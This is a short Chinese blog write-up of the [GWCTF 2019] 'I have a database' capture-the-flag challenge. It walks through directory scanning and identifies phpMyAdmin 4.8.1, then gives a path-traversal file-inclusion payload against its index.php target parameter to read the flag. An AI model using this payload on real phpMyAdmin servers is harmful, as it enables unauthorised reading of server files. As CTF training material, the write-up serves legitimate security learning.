Xxiaoma解题 [GWCTF 2019]我有一个数据库
1.[GXYCTF2019]Ping Ping Ping 1 - Xxiaoma解题2.[极客大挑战 2019]EasySQL 1 -Xxiaoma解题
3.Xxiaoma解题 [GWCTF 2019]我有一个数据库
4.Xxiaoma解题[BUUCTF 2018]Online ToolOXO1 打开题目看到
0X02 用kali工具dirsearch扫描后发现有以下网站
0X03 依次查看
0X04 构造payload
发现版本为4.8.1,网上搜一下后发现该版本存在框架代码漏洞可以利用
构造payload为:phpmyadmin/index.php?target=db_datadict.php?../../../../../../../../flag
本文作者:Xxiaomaa
本文链接:https://www.cnblogs.com/mhwq/p/18528154
版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】博客园社区专享云产品让利特惠,阿里云新客6.5折上折
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步